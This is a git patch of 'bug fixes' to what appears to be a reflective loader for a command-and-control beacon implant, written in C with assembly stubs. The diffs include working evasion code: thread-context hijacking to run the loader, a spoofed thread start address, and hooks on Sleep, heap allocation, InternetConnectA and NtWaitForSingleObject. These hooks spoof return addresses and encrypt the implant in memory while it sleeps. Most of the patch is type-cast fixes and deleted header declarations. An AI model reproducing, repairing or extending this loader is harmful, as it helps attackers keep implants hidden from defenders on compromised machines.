From 6ab821a01a4da8bc03c041a6f1c4e2678758db13 Mon Sep 17 00:00:00 2001 From: Kyle Avery <9327972+kyleavery@users.noreply.github.com> Date: Thu, 28 Sep 2023 19:37:46 +0000 Subject: [PATCH] bug fixes --- Makefile | 11 +- src/ace.c | 34 ++-- src/hooks/delay.c | 10 +- src/hooks/spoof.c | 6 +- src/include.h | 14 +- src/native.h | 473 +--------------------------------------------- src/retaddr.c | 22 +-- src/util.c | 10 +- 8 files changed, 52 insertions(+), 528 deletions(-) diff --git a/Makefile b/Makefile index 96bf792..90be88e 100644 --- a/Makefile +++ b/Makefile @@ -4,18 +4,19 @@ OUT := bin CFLAGS := $(CFLAGS) -Os -fno-asynchronous-unwind-tables -nostdlib CFLAGS := $(CFLAGS) -fno-ident -fpack-struct=8 -falign-functions=1 -CFLAGS := $(CFLAGS) -s -ffunction-sections -falign-jumps=1 -w -CFLAGS := $(CFLAGS) -falign-labels=1 -fPIC -Wl,-Tsrc/link.ld +CFLAGS := $(CFLAGS) -s -ffunction-sections -falign-jumps=1 -Wall +CFLAGS := $(CFLAGS) -Werror -falign-labels=1 -fPIC -Wno-array-bounds LFLAGS := $(LFLAGS) -Wl,-s,--no-seh,--enable-stdcall-fixup +LFLAGS := $(LFLAGS) -Wl,--image-base=0,-Tsrc/link.ld default: clean aceldr release: default zip aceldr: - @ nasm -f win64 src/asm/start.asm -o $(OUT)/start.tmp.o - @ nasm -f win64 src/asm/misc.asm -o $(OUT)/misc.tmp.o - @ nasm -f win64 src/asm/spoof.asm -o $(OUT)/spoof.tmp.o + @ nasm -Werror=all -f win64 src/asm/start.asm -o $(OUT)/start.tmp.o + @ nasm -Werror=all -f win64 src/asm/misc.asm -o $(OUT)/misc.tmp.o + @ nasm -Werror=all -f win64 src/asm/spoof.asm -o $(OUT)/spoof.tmp.o @ $(CC_X64) src/*.c $(OUT)/start.tmp.o $(OUT)/misc.tmp.o $(OUT)/spoof.tmp.o src/hooks/*.c -o $(OUT)/$(NAME).x64.exe $(CFLAGS) $(LFLAGS) -I. @ python3 scripts/extract.py -f $(OUT)/$(NAME).x64.exe -o $(OUT)/$(NAME).x64.bin @ rm $(OUT)/*.tmp.o 2>/dev/null || true diff --git a/src/ace.c b/src/ace.c index 3adf7b2..205a359 100644 --- a/src/ace.c +++ b/src/ace.c @@ -38,7 +38,7 @@ typedef struct } REG, *PREG; #ifndef PTR_TO_HOOK -#define PTR_TO_HOOK( a, b ) U_PTR( U_PTR( a ) + OFFSET( b ) - OFFSET( Stub ) ) +#define PTR_TO_HOOK( a, b ) C_PTR( U_PTR( a ) + OFFSET( b ) - OFFSET( Stub ) ) #endif #ifndef memcpy @@ -72,19 +72,18 @@ SECTION( B ) NTSTATUS resolveLoaderFunctions( PAPI pApi ) return STATUS_SUCCESS; }; -SECTION( B ) REG calculateRegions( VOID ) +SECTION( B ) VOID calculateRegions( PREG pReg ) { - REG Reg = { 0 }; SIZE_T ILn = 0; - Reg.Dos = C_PTR( G_END() ); - Reg.NT = C_PTR( U_PTR( Reg.Dos ) + Reg.Dos->e_lfanew ); + pReg->Dos = C_PTR( G_END() ); + pReg->NT = C_PTR( U_PTR( pReg->Dos ) + pReg->Dos->e_lfanew ); - ILn = ( ( ( Reg.NT->OptionalHeader.SizeOfImage ) + 0x1000 - 1 ) &~( 0x1000 - 1 ) ); - Reg.Exec = ( ( ( G_END() - OFFSET( Stub ) ) + 0x1000 - 1 ) &~ ( 0x1000 - 1 ) ); - Reg.Full = ILn + Reg.Exec; - - return Reg; + ILn = ( ( ( pReg->NT->OptionalHeader.SizeOfImage ) + 0x1000 - 1 ) &~( 0x1000 - 1 ) ); + pReg->Exec = ( ( ( G_END() - OFFSET( Stub ) ) + 0x1000 - 1 ) &~ ( 0x1000 - 1 ) ); + pReg->Full = ILn + pReg->Exec; + + return; }; SECTION( B ) VOID copyStub( PVOID buffer ) @@ -137,7 +136,7 @@ SECTION( B ) VOID installHooks( PVOID map, PVOID buffer, PIMAGE_NT_HEADERS nt ) if( Dir->VirtualAddress ) { - LdrProcessRel( C_PTR( map ), C_PTR( U_PTR( map ) + Dir->VirtualAddress ), nt->OptionalHeader.ImageBase ); + LdrProcessRel( C_PTR( map ), C_PTR( U_PTR( map ) + Dir->VirtualAddress ), C_PTR( nt->OptionalHeader.ImageBase ) ); }; }; @@ -153,8 +152,8 @@ SECTION( B ) VOID fillStub( PVOID buffer, HANDLE heap, SIZE_T region ) SECTION( B ) VOID executeBeacon( PVOID entry ) { DLLMAIN_T Ent = entry; - Ent( OFFSET( Start ), 1, NULL ); - Ent( OFFSET( Start ), 4, NULL ); + Ent( ( HMODULE )OFFSET( Start ), 1, NULL ); + Ent( ( HMODULE )OFFSET( Start ), 4, NULL ); }; SECTION( B ) VOID Loader( VOID ) @@ -172,7 +171,7 @@ SECTION( B ) VOID Loader( VOID ) if( resolveLoaderFunctions( &Api ) == STATUS_SUCCESS ) { - Reg = calculateRegions(); + calculateRegions( &Reg ); Status = Api.ntdll.NtAllocateVirtualMemory( ( HANDLE )-1, &MemoryBuffer, 0, &Reg.Full, MEM_COMMIT, PAGE_READWRITE ); if( Status == STATUS_SUCCESS ) { @@ -226,16 +225,15 @@ SECTION( B ) NTSTATUS resolveAceFunctions( PAPI pApi ) SECTION( B ) NTSTATUS createBeaconThread( PAPI pApi, PHANDLE thread ) { BOOL Suspended = TRUE; - LPTHREAD_START_ROUTINE StartAddress = pApi->ntdll.RtlUserThreadStart + 0x21; + PVOID StartAddress = C_PTR( pApi->ntdll.RtlUserThreadStart + 0x21 ); - return pApi->ntdll.RtlCreateUserThread( ( HANDLE )-1, NULL, Suspended, 0, 0, 0, StartAddress, NULL, thread, NULL ); + return pApi->ntdll.RtlCreateUserThread( ( HANDLE )-1, NULL, Suspended, 0, 0, 0, ( PUSER_THREAD_START_ROUTINE )StartAddress, NULL, thread, NULL ); }; SECTION( B ) VOID Ace( VOID ) { API Api; CONTEXT Ctx; - NTSTATUS Status; HANDLE Thread; RtlSecureZeroMemory( &Api, sizeof( Api ) ); @@ -247,7 +245,7 @@ SECTION( B ) VOID Ace( VOID ) { Ctx.ContextFlags = CONTEXT_CONTROL; Api.ntdll.NtGetContextThread( Thread, &Ctx ); - Ctx.Rip = C_PTR( Loader ); + Ctx.Rip = ( DWORD64 )C_PTR( Loader ); Api.ntdll.NtSetContextThread( Thread, &Ctx ); Api.ntdll.NtResumeThread( Thread, NULL ); diff --git a/src/hooks/delay.c b/src/hooks/delay.c index 3778414..1215996 100644 --- a/src/hooks/delay.c +++ b/src/hooks/delay.c @@ -131,7 +131,7 @@ SECTION( D ) NTSTATUS queueAPCs( PAPI pApi, PCONTEXT* contexts, HANDLE hThread ) NTSTATUS Status; for( int i = 9; i >= 0; i-- ) { - Status = pApi->ntdll.NtQueueApcThread( hThread, pApi->ntdll.NtContinue, contexts[i], NULL, NULL ); + Status = pApi->ntdll.NtQueueApcThread( hThread, C_PTR( pApi->ntdll.NtContinue ), contexts[i], NULL, NULL ); if( Status != STATUS_SUCCESS ) { break; @@ -147,7 +147,7 @@ SECTION( D ) VOID initContexts( PAPI pApi, PCONTEXT* contexts ) for( int i = 13; i >= 0; i-- ) { - contexts[i] = ( PCONTEXT )SPOOF( pApi->ntdll.RtlAllocateHeap, pApi->hNtdll, pApi->szNtdll, hProcessHeap, HEAP_ZERO_MEMORY, sizeof( CONTEXT ) ); + contexts[i] = ( PCONTEXT )C_PTR( SPOOF( pApi->ntdll.RtlAllocateHeap, pApi->hNtdll, pApi->szNtdll, hProcessHeap, C_PTR( HEAP_ZERO_MEMORY ), C_PTR( sizeof( CONTEXT ) ) ) ); if( i < 10 ) { *contexts[i] = *contexts[11]; @@ -233,7 +233,7 @@ SECTION( D ) VOID delayExec( PAPI pApi ) { #define CHECKERR( status ) if( status != STATUS_SUCCESS ) { goto cleanup; }; - NTSTATUS Status = NULL; + NTSTATUS Status = 0; HANDLE SyncEvt = NULL; HANDLE WaitThd = NULL; HANDLE OrigThd = NULL; @@ -447,7 +447,7 @@ SECTION( D ) NTSTATUS resolveSleepHookFunctions( PAPI pApi ) }; pApi->ntdll.RtlInitAnsiString( &Str, C_PTR( OFFSET( "SystemFunction032" ) ) ); - pApi->ntdll.LdrGetProcedureAddress( pApi->hAdvapi, &Str, 0, &pApi->advapi.SystemFunction032 ); + pApi->ntdll.LdrGetProcedureAddress( pApi->hAdvapi, &Str, 0, ( PVOID* )&pApi->advapi.SystemFunction032 ); RtlSecureZeroMemory( &Uni, sizeof( Uni ) ); RtlSecureZeroMemory( &Str, sizeof( Str ) ); @@ -470,7 +470,7 @@ SECTION( D ) VOID Sleep_Hook( DWORD dwMilliseconds ) API Api; RtlSecureZeroMemory( &Api, sizeof( Api ) ); - Api.CFG = NULL; + Api.CFG = 0; Api.dwMilliseconds = dwMilliseconds; Api.Buffer = C_PTR( ( ( PSTUB ) OFFSET( Stub ) )->Region ); Api.Length = U_PTR( ( ( PSTUB ) OFFSET( Stub ) )->Size ); diff --git a/src/hooks/spoof.c b/src/hooks/spoof.c index 62113b7..79734d1 100644 --- a/src/hooks/spoof.c +++ b/src/hooks/spoof.c @@ -31,7 +31,7 @@ SECTION( D ) PVOID RtlAllocateHeap_Hook( PVOID heapHandle, ULONG flags, SIZE_T s Api.ntdll.RtlAllocateHeap = FindFunction( hNtdll, H_API_RTLALLOCATEHEAP ); - return SPOOF( Api.ntdll.RtlAllocateHeap, hNtdll, Size, heapHandle, flags, size ); + return SPOOF( Api.ntdll.RtlAllocateHeap, hNtdll, Size, heapHandle, C_PTR( U_PTR( flags ) ), C_PTR( U_PTR ( size ) ) ); }; SECTION( D ) LPVOID HeapAlloc_Hook( HANDLE hHeap, DWORD dwFlags, SIZE_T dwBytes ) @@ -53,7 +53,7 @@ SECTION( D ) HINTERNET InternetConnectA_Hook( HINTERNET hInternet, LPCSTR lpszSe Api.net.InternetConnectA = FindFunction( hNet, H_API_INTERNETCONNECTA ); - return SPOOF( Api.net.InternetConnectA, hNet, Size, hInternet, lpszServerName, nServerPort, lpszUserName, lpszPassword, dwService, dwFlags, dwContext ); + return ( HINTERNET )SPOOF( Api.net.InternetConnectA, hNet, Size, hInternet, C_PTR( lpszServerName ), C_PTR( U_PTR( nServerPort ) ), C_PTR( lpszUserName ), C_PTR( lpszPassword ), C_PTR( U_PTR ( dwService ) ), C_PTR( U_PTR( dwFlags ) ), C_PTR( U_PTR( dwContext ) ) ); }; SECTION( D ) NTSTATUS NtWaitForSingleObject_Hook( HANDLE handle, BOOLEAN alertable, PLARGE_INTEGER timeout ) @@ -70,5 +70,5 @@ SECTION( D ) NTSTATUS NtWaitForSingleObject_Hook( HANDLE handle, BOOLEAN alertab Api.ntdll.NtWaitForSingleObject = FindFunction( hNtdll, H_API_NTWAITFORSINGLEOBJECT ); - return SPOOF( Api.ntdll.NtWaitForSingleObject, hNtdll, Size, handle, alertable, timeout ); + return ( NTSTATUS )U_PTR( SPOOF( Api.ntdll.NtWaitForSingleObject, hNtdll, Size, handle, C_PTR( U_PTR( alertable ) ), timeout ) ); }; diff --git a/src/include.h b/src/include.h index 990c806..c2110d4 100644 --- a/src/include.h +++ b/src/include.h @@ -41,10 +41,16 @@ typedef struct __attribute__(( packed )) HANDLE Heap; } STUB, *PSTUB ; -static ULONG_PTR Start( VOID ); -static ULONG_PTR GetIp( VOID ); -static ULONG_PTR Stub( VOID ); -static ULONG_PTR Spoof( VOID ); +typedef struct { + const void* trampoline; // always JMP RBX + void* function; // Target Function + void* rbx; // Placeholder +} PRM, *PPRM; + +extern ULONG_PTR Start( VOID ); +extern ULONG_PTR GetIp( VOID ); +extern ULONG_PTR Stub( VOID ); +extern PVOID Spoof( PVOID, PVOID, PVOID, PVOID, PPRM, PVOID, PVOID, PVOID, PVOID, PVOID ); #include "util.h" diff --git a/src/native.h b/src/native.h index f18b160..d74ce7f 100644 --- a/src/native.h +++ b/src/native.h @@ -1,10 +1,6 @@ #if !defined(_NTDLL_) #define _NTDLL_ -#pragma warning( disable:4001 ) -#pragma warning( disable:4201 ) -#pragma warning( disable:4214 ) - #if defined(__ICL) #pragma warning ( disable : 344 ) #endif @@ -9680,21 +9676,8 @@ typedef enum _TABLE_SEARCH_RESULT TableInsertAsRight } TABLE_SEARCH_RESULT; -typedef enum _RTL_GENERIC_COMPARE_RESULTS -{ - GenericLessThan, - GenericGreaterThan, - GenericEqual -} RTL_GENERIC_COMPARE_RESULTS; - struct _RTL_AVL_TABLE; -typedef RTL_GENERIC_COMPARE_RESULTS (NTAPI *PRTL_AVL_COMPARE_ROUTINE)( - IN struct _RTL_AVL_TABLE *Table, - IN PVOID FirstStruct, - IN PVOID SecondStruct - ); - typedef PVOID (NTAPI *PRTL_AVL_ALLOCATE_ROUTINE)( IN struct _RTL_AVL_TABLE *Table, IN CLONG ByteSize @@ -9711,14 +9694,6 @@ typedef NTSTATUS (NTAPI *PRTL_AVL_MATCH_FUNCTION)( IN PVOID MatchData ); -typedef - RTL_GENERIC_COMPARE_RESULTS - (NTAPI *PRTL_AVL_COMPARE_ROUTINE) ( - struct _RTL_AVL_TABLE *Table, - PVOID FirstStruct, - PVOID SecondStruct - ); - typedef PVOID (NTAPI *PRTL_AVL_ALLOCATE_ROUTINE) ( @@ -9735,28 +9710,6 @@ typedef PVOID MatchData ); -typedef - RTL_GENERIC_COMPARE_RESULTS - (NTAPI *PRTL_GENERIC_COMPARE_ROUTINE) ( - struct _RTL_GENERIC_TABLE *Table, - PVOID FirstStruct, - PVOID SecondStruct - ); - -typedef - PVOID - (NTAPI *PRTL_GENERIC_ALLOCATE_ROUTINE) ( - struct _RTL_GENERIC_TABLE *Table, - ULONG ByteSize - ); - -typedef - VOID - (NTAPI *PRTL_GENERIC_FREE_ROUTINE) ( - struct _RTL_GENERIC_TABLE *Table, - PVOID Buffer - ); - typedef struct _RTL_BALANCED_LINKS { struct _RTL_BALANCED_LINKS *Parent; @@ -9766,34 +9719,6 @@ typedef struct _RTL_BALANCED_LINKS UCHAR Reserved[3]; } RTL_BALANCED_LINKS, *PRTL_BALANCED_LINKS; -typedef struct _RTL_AVL_TABLE -{ - RTL_BALANCED_LINKS BalancedRoot; - PVOID OrderedPointer; - ULONG WhichOrderedElement; - ULONG NumberGenericTableElements; - ULONG DepthOfTree; - PRTL_BALANCED_LINKS RestartKey; - ULONG DeleteCount; - PRTL_AVL_COMPARE_ROUTINE CompareRoutine; - PRTL_AVL_ALLOCATE_ROUTINE AllocateRoutine; - PRTL_AVL_FREE_ROUTINE FreeRoutine; - PVOID TableContext; -} RTL_AVL_TABLE, *PRTL_AVL_TABLE; - -typedef struct _RTL_GENERIC_TABLE { - PRTL_SPLAY_LINKS TableRoot; - LIST_ENTRY InsertOrderList; - PLIST_ENTRY OrderedPointer; - ULONG WhichOrderedElement; - ULONG NumberGenericTableElements; - PRTL_GENERIC_COMPARE_ROUTINE CompareRoutine; - PRTL_GENERIC_ALLOCATE_ROUTINE AllocateRoutine; - PRTL_GENERIC_FREE_ROUTINE FreeRoutine; - PVOID TableContext; -} RTL_GENERIC_TABLE; -typedef RTL_GENERIC_TABLE *PRTL_GENERIC_TABLE; - typedef struct _GENERATE_NAME_CONTEXT { USHORT Checksum; @@ -10087,8 +10012,6 @@ typedef struct _KLDR_DATA_TABLE_ENTRY #define RTL_HEAP_UNCOMMITTED_RANGE (USHORT)0x0100 #define RTL_HEAP_PROTECTED_ENTRY (USHORT)0x0200 -#pragma warning(disable: 4273) - typedef struct _DISPATCHER_HEADER { union @@ -11331,24 +11254,11 @@ typedef struct _RTL_PATCH_HEADER HOTPATCH_MODULE_ENTRY HotpatchModuleEntry; } RTL_PATCH_HEADER, *PRTL_PATCH_HEADER; - - -#pragma warning(default: 4273) - #ifndef _SLIST_HEADER_ #define _SLIST_HEADER_ #if defined(_M_X64) - - - - - - - - - #pragma warning(push) #pragma warning(disable:4324) typedef struct DECLSPEC_ALIGN(16) _SLIST_ENTRY *PSLIST_ENTRY; @@ -11389,10 +11299,6 @@ typedef union _SLIST_HEADER { #endif - - - - PSLIST_ENTRY __fastcall RtlInterlockedPushListSList ( @@ -11411,104 +11317,6 @@ RtlAssert( IN OPTIONAL PSTR MutableMessage ); -VOID -NTAPI -RtlInitializeGenericTableAvl ( - PRTL_AVL_TABLE Table, - PRTL_AVL_COMPARE_ROUTINE CompareRoutine, - PRTL_AVL_ALLOCATE_ROUTINE AllocateRoutine, - PRTL_AVL_FREE_ROUTINE FreeRoutine, - PVOID TableContext - ); - -PVOID -NTAPI -RtlInsertElementGenericTableAvl ( - PRTL_AVL_TABLE Table, - PVOID Buffer, - ULONG BufferSize, - PBOOLEAN NewElement OPTIONAL - ); - -PVOID -NTAPI -RtlInsertElementGenericTableFullAvl ( - PRTL_AVL_TABLE Table, - PVOID Buffer, - ULONG BufferSize, - PBOOLEAN NewElement OPTIONAL, - PVOID NodeOrParent, - TABLE_SEARCH_RESULT SearchResult - ); - -BOOLEAN -NTAPI -RtlDeleteElementGenericTableAvl ( - PRTL_AVL_TABLE Table, - PVOID Buffer - ); - -PVOID -NTAPI -RtlLookupElementGenericTableAvl ( - PRTL_AVL_TABLE Table, - PVOID Buffer - ); - -PVOID -NTAPI -RtlLookupElementGenericTableFullAvl ( - PRTL_AVL_TABLE Table, - PVOID Buffer, - OUT PVOID *NodeOrParent, - OUT TABLE_SEARCH_RESULT *SearchResult - ); - -PVOID -NTAPI -RtlEnumerateGenericTableAvl ( - PRTL_AVL_TABLE Table, - BOOLEAN Restart - ); - -PVOID -NTAPI -RtlEnumerateGenericTableWithoutSplayingAvl ( - PRTL_AVL_TABLE Table, - PVOID *RestartKey - ); - -PVOID -NTAPI -RtlEnumerateGenericTableLikeADirectory ( - IN PRTL_AVL_TABLE Table, - IN PRTL_AVL_MATCH_FUNCTION MatchFunction, - IN PVOID MatchData, - IN ULONG NextFlag, - IN OUT PVOID *RestartKey, - IN OUT PULONG DeleteCount, - IN OUT PVOID Buffer - ); - -PVOID -NTAPI -RtlGetElementGenericTableAvl ( - PRTL_AVL_TABLE Table, - ULONG I - ); - -ULONG -NTAPI -RtlNumberGenericTableElementsAvl ( - PRTL_AVL_TABLE Table - ); - -BOOLEAN -NTAPI -RtlIsGenericTableEmptyAvl ( - PRTL_AVL_TABLE Table - ); - PRTL_SPLAY_LINKS NTAPI RtlSplay ( @@ -11552,92 +11360,6 @@ RtlRealPredecessor ( PRTL_SPLAY_LINKS Links ); -VOID -NTAPI -RtlInitializeGenericTable ( - PRTL_GENERIC_TABLE Table, - PRTL_GENERIC_COMPARE_ROUTINE CompareRoutine, - PRTL_GENERIC_ALLOCATE_ROUTINE AllocateRoutine, - PRTL_GENERIC_FREE_ROUTINE FreeRoutine, - PVOID TableContext - ); - -PVOID -NTAPI -RtlInsertElementGenericTable ( - PRTL_GENERIC_TABLE Table, - PVOID Buffer, - ULONG BufferSize, - PBOOLEAN NewElement OPTIONAL - ); - -PVOID -NTAPI -RtlInsertElementGenericTableFull ( - PRTL_GENERIC_TABLE Table, - PVOID Buffer, - ULONG BufferSize, - PBOOLEAN NewElement OPTIONAL, - PVOID NodeOrParent, - TABLE_SEARCH_RESULT SearchResult - ); - -BOOLEAN -NTAPI -RtlDeleteElementGenericTable ( - PRTL_GENERIC_TABLE Table, - PVOID Buffer - ); - -PVOID -NTAPI -RtlLookupElementGenericTable ( - PRTL_GENERIC_TABLE Table, - PVOID Buffer - ); - -PVOID -NTAPI -RtlLookupElementGenericTableFull ( - PRTL_GENERIC_TABLE Table, - PVOID Buffer, - OUT PVOID *NodeOrParent, - OUT TABLE_SEARCH_RESULT *SearchResult - ); - -PVOID -NTAPI -RtlEnumerateGenericTable ( - PRTL_GENERIC_TABLE Table, - BOOLEAN Restart - ); - -PVOID -NTAPI -RtlEnumerateGenericTableWithoutSplaying ( - PRTL_GENERIC_TABLE Table, - PVOID *RestartKey - ); - -PVOID -NTAPI -RtlGetElementGenericTable( - PRTL_GENERIC_TABLE Table, - ULONG I - ); - -ULONG -NTAPI -RtlNumberGenericTableElements( - PRTL_GENERIC_TABLE Table - ); - -BOOLEAN -NTAPI -RtlIsGenericTableEmpty ( - PRTL_GENERIC_TABLE Table - ); - NTSTATUS NTAPI RtlInitializeHeapManager( @@ -12163,13 +11885,6 @@ RtlIpv4AddressToStringA ( OUT PSTR S ); -PSTR -NTAPI -RtlIpv6AddressToStringA ( - IN const struct in6_addr *Addr, - OUT PSTR S - ); - NTSTATUS NTAPI RtlIpv4AddressToStringExA( @@ -12179,16 +11894,6 @@ RtlIpv4AddressToStringExA( IN OUT PULONG AddressStringLength ); -NTSTATUS -NTAPI -RtlIpv6AddressToStringExA( - IN const struct in6_addr *Address, - IN ULONG ScopeId, - IN USHORT Port, - OUT PSTR AddressString, - IN OUT PULONG AddressStringLength - ); - PWSTR NTAPI RtlIpv4AddressToStringW ( @@ -12196,13 +11901,6 @@ RtlIpv4AddressToStringW ( OUT PWSTR S ); -PWSTR -NTAPI -RtlIpv6AddressToStringW ( - IN const struct in6_addr *Addr, - OUT PWSTR S - ); - NTSTATUS NTAPI RtlIpv4AddressToStringExW( @@ -12212,16 +11910,6 @@ RtlIpv4AddressToStringExW( IN OUT PULONG AddressStringLength ); -NTSTATUS -NTAPI -RtlIpv6AddressToStringExW( - IN const struct in6_addr *Address, - IN ULONG ScopeId, - IN USHORT Port, - OUT PWSTR AddressString, - IN OUT PULONG AddressStringLength - ); - NTSTATUS NTAPI RtlIpv4StringToAddressA ( @@ -12231,14 +11919,6 @@ RtlIpv4StringToAddressA ( OUT struct in_addr *Addr ); -NTSTATUS -NTAPI -RtlIpv6StringToAddressA ( - IN PCSTR S, - OUT PCSTR *Terminator, - OUT struct in6_addr *Addr - ); - NTSTATUS NTAPI RtlIpv4StringToAddressExA ( @@ -12248,15 +11928,6 @@ RtlIpv4StringToAddressExA ( OUT PUSHORT Port ); -NTSTATUS -NTAPI -RtlIpv6StringToAddressExA ( - IN PCSTR AddressString, - OUT struct in6_addr *Address, - OUT PULONG ScopeId, - OUT PUSHORT Port - ); - NTSTATUS NTAPI RtlIpv4StringToAddressW ( @@ -12266,14 +11937,6 @@ RtlIpv4StringToAddressW ( OUT struct in_addr *Addr ); -NTSTATUS -NTAPI -RtlIpv6StringToAddressW ( - IN PCWSTR S, - OUT PCWSTR *Terminator, - OUT struct in6_addr *Addr - ); - NTSTATUS NTAPI RtlIpv4StringToAddressExW ( @@ -12283,15 +11946,6 @@ RtlIpv4StringToAddressExW ( OUT PUSHORT Port ); -NTSTATUS -NTAPI -RtlIpv6StringToAddressExW ( - IN PCWSTR AddressString, - OUT struct in6_addr *Address, - OUT PULONG ScopeId, - OUT PUSHORT Port - ); - NTSTATUS NTAPI RtlIntegerToUnicodeString ( @@ -16672,11 +16326,11 @@ NtSetLdtEntries ( NTSTATUS NTAPI NtQueueApcThread ( - IN HANDLE ThreadHandle, - IN PIO_APC_ROUTINE ApcRoutine, - IN OPTIONAL PVOID ApcRoutineContext, - IN OPTIONAL PIO_STATUS_BLOCK ApcStatusBlock, - IN OPTIONAL ULONG ApcReserved + IN HANDLE ThreadHandle, + IN PVOID ApcRoutine, + IN OPTIONAL PVOID ApcRoutineContext, + IN OPTIONAL PVOID ApcStatusBlock, + IN OPTIONAL PVOID ApcReserved ); NTSTATUS @@ -20585,71 +20239,6 @@ DebugService2 ( ULONG Service ); - -__inline -LARGE_INTEGER -NTAPI -RtlLargeIntegerAdd ( - LARGE_INTEGER Addend1, - LARGE_INTEGER Addend2 - ); - -__inline -LARGE_INTEGER -NTAPI -RtlEnlargedIntegerMultiply ( - LONG Multiplicand, - LONG Multiplier - ); - -__inline -LARGE_INTEGER -NTAPI -RtlEnlargedUnsignedMultiply ( - ULONG Multiplicand, - ULONG Multiplier - ); - -__inline -ULONG -NTAPI -RtlEnlargedUnsignedDivide ( - IN ULARGE_INTEGER Dividend, - IN ULONG Divisor, - IN PULONG Remainder OPTIONAL - ); - -__inline -LARGE_INTEGER -NTAPI -RtlLargeIntegerNegate ( - LARGE_INTEGER Subtrahend - ); - -__inline -LARGE_INTEGER -NTAPI -RtlLargeIntegerSubtract ( - LARGE_INTEGER Minuend, - LARGE_INTEGER Subtrahend - ); - -LARGE_INTEGER -NTAPI -RtlExtendedMagicDivide ( - LARGE_INTEGER Dividend, - LARGE_INTEGER MagicDivisor, - CCHAR ShiftCount - ); - -LARGE_INTEGER -NTAPI -RtlExtendedLargeIntegerDivide ( - LARGE_INTEGER Dividend, - ULONG Divisor, - PULONG Remainder - ); - LARGE_INTEGER NTAPI RtlLargeIntegerDivide ( @@ -20665,56 +20254,6 @@ RtlExtendedIntegerMultiply ( LONG Multiplier ); -__inline -LARGE_INTEGER -NTAPI -RtlConvertLongToLargeInteger ( - LONG SignedInteger - ); - - -__inline -LARGE_INTEGER -NTAPI -RtlConvertUlongToLargeInteger ( - ULONG UnsignedInteger - ); - -__inline -LARGE_INTEGER -NTAPI -RtlLargeIntegerShiftLeft ( - LARGE_INTEGER LargeInteger, - CCHAR ShiftCount - ); - -__inline -LARGE_INTEGER -NTAPI -RtlLargeIntegerShiftRight ( - LARGE_INTEGER LargeInteger, - CCHAR ShiftCount - ); - - -__inline -LARGE_INTEGER -NTAPI -RtlLargeIntegerArithmeticShift ( - LARGE_INTEGER LargeInteger, - CCHAR ShiftCount - ); - - -__inline -BOOLEAN -NTAPI -RtlCheckBit ( - PRTL_BITMAP BitMapHeader, - ULONG BitPosition - ); - - BOOLEAN NTAPI RtlIsValidOemCharacter ( @@ -22179,7 +21718,7 @@ typedef struct _CFG_CALL_TARGET_INFO { } CFG_CALL_TARGET_INFO, *PCFG_CALL_TARGET_INFO; #endif -BOOLEAN +WINBOOL WINAPI SetProcessValidCallTargets( HANDLE hProcess, diff --git a/src/retaddr.c b/src/retaddr.c index 62037e4..564836f 100644 --- a/src/retaddr.c +++ b/src/retaddr.c @@ -5,14 +5,6 @@ #include "include.h" - -typedef struct { - const void* trampoline; // always JMP RBX - void* function; // Target Function - void* rbx; // Placeholder -} PRM, *PPRM; - - SECTION( E ) PVOID SpoofRetAddr( PVOID function, HANDLE module, ULONG size, PVOID a, PVOID b, PVOID c, PVOID d, PVOID e, PVOID f, PVOID g, PVOID h ) { PVOID Trampoline; @@ -23,19 +15,7 @@ SECTION( E ) PVOID SpoofRetAddr( PVOID function, HANDLE module, ULONG size, PVOI if( Trampoline != NULL ) { PRM param = { Trampoline, function }; - return ( - ( - PVOID( * ) ( - PVOID, PVOID, PVOID, PVOID, PPRM, PVOID, PVOID, PVOID, PVOID, PVOID - ) - ) - ( - ( PVOID )Spoof - ) - ) - ( - a, b, c, d, ¶m, NULL, e, f, g, h - ); + return Spoof( a, b, c, d, ¶m, NULL, e, f, g, h ); }; }; diff --git a/src/util.c b/src/util.c index ca6fcc3..5269539 100644 --- a/src/util.c +++ b/src/util.c @@ -130,14 +130,14 @@ SECTION( E ) VOID LdrProcessIat( PVOID image, PVOID directory ) for( ; Otd->u1.AddressOfData != 0 ; ++Otd, ++Ntd ) { if( IMAGE_SNAP_BY_ORDINAL( Otd->u1.Ordinal ) ) { if( NT_SUCCESS( Api.LdrGetProcedureAddress( Mod, NULL, IMAGE_ORDINAL( Otd->u1.Ordinal ), &Fcn ) ) ) { - Ntd->u1.Function = Fcn; + Ntd->u1.Function = ( ULONGLONG )Fcn; }; } else { Ibn = C_PTR( U_PTR( image ) + Otd->u1.AddressOfData ); Api.RtlInitAnsiString( &Ani, C_PTR( Ibn->Name ) ); if( NT_SUCCESS( Api.LdrGetProcedureAddress( Mod, &Ani, 0, &Fcn ) ) ) { - Ntd->u1.Function = Fcn; + Ntd->u1.Function = ( ULONGLONG )Fcn; }; }; }; @@ -153,8 +153,8 @@ SECTION( E ) VOID LdrProcessRel( PVOID image, PVOID directory, PVOID imageBase ) PIMAGE_RELOC Rel = NULL; PIMAGE_BASE_RELOCATION Ibr = NULL; - Ibr = C_PTR( directory ); - Ofs = C_PTR( U_PTR( image ) - U_PTR( imageBase ) ); + Ibr = ( PIMAGE_BASE_RELOCATION )( directory ); + Ofs = U_PTR( U_PTR( image ) - U_PTR( imageBase ) ); while ( Ibr->VirtualAddress != 0 ) { Rel = ( PIMAGE_RELOC )( Ibr + 1 ); @@ -197,7 +197,7 @@ SECTION( E ) VOID LdrHookImport( PVOID image, PVOID directory, ULONG hash, PVOID if( Djb == hash ) { - Ntd->u1.Function = C_PTR( function ); + Ntd->u1.Function = ( ULONGLONG )C_PTR( function ); }; }; };